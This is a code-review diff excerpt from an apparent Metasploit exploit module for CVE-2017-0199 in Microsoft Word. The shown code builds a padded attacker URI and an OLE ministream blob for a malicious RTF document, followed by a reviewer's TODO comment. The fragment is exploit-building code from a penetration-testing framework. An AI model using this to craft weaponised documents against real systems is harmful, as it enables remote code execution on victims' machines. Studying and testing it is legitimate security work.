modules/exploits/windows/fileformat/office_word_hta.rb

```diff
@@ -0,0 +1,132 @@
+    uri.delete!("\\x")
+    uri.delete!("\\")
+
+    padding_length = uri_maxlength * 2 - uri.length
+    fail_with(Failure::BadConfig, "please use a uri < #{uri_maxlength} bytes ") if padding_length.negative?
+    padding_length.times { uri << "0" }
+    uri
+  end
+
+  def create_ole_ministream_data
+    # require 'rex/ole'
+    # ole = Rex::OLE::Storage.new('cve-2017-0199.bin', Rex::OLE::STGM_READ)
+    # ministream = ole.instance_variable_get(:@ministream)
+    # ministream_data = ministream.instance_variable_get(:@data)
+
+    ministream_data = ""
+    ministream_data << "01000002090000000100000000000000" # 00000000: ................
+    ministream_data << "0000000000000000a4000000e0c9ea79" # 00000010: ...............y
+    ministream_data << "f9bace118c8200aa004ba90b8c000000" # 00000020: .........K......
+    ministream_data << generate_uri
+    ministream_data << "00000000795881f43b1d7f48af2c825d" # 000000a0: ....yX..;..H.,.]
+    ministream_data << "c485276300000000a5ab0000ffffffff" # 000000b0: ..'c............
+    ministream_data << "0609020000000000c000000000000046" # 000000c0: ...............F
+    ministream_data << "00000000ffffffff0000000000000000" # 000000d0: ................
+    ministream_data << "906660a637b5d2010000000000000000" # 000000e0: .f`.7...........
+    ministream_data << "00000000000000000000000000000000" # 000000f0: ................
+    ministream_data << "100203000d0000000000000000000000" # 00000100: ................
+    ministream_data << "00000000000000000000000000000000" # 00000110: ................
+    ministream_data << "00000000000000000000000000000000" # 00000120: ................
+    ministream_data << "00000000000000000000000000000000" # 00000130: ................
+    ministream_data << "00000000000000000000000000000000" # 00000140: ................
+    ministream_data << "00000000000000000000000000000000" # 00000150: ................
+    ministream_data << "00000000000000000000000000000000" # 00000160: ................
+    ministream_data << "00000000000000000000000000000000" # 00000170: ................
+    ministream_data << "00000000000000000000000000000000" # 00000180: ................
+    ministream_data << "00000000000000000000000000000000" # 00000190: ................
+    ministream_data << "00000000000000000000000000000000" # 000001a0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001b0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001c0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001d0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001e0: ................
+    ministream_data << "00000000000000000000000000000000" # 000001f0: ................
+    ministream_data
+  end
+
+  def create_rtf_format
+    template_path = ::File.join(Msf::Config.data_directory, "exploits", "cve-2017-0199.rtf")
+    template_rtf = ::File.open(template_path, 'rb')
```

Comment:
TODO - it would be nice if there was a wrapper to get a data directory file (not needed for this module)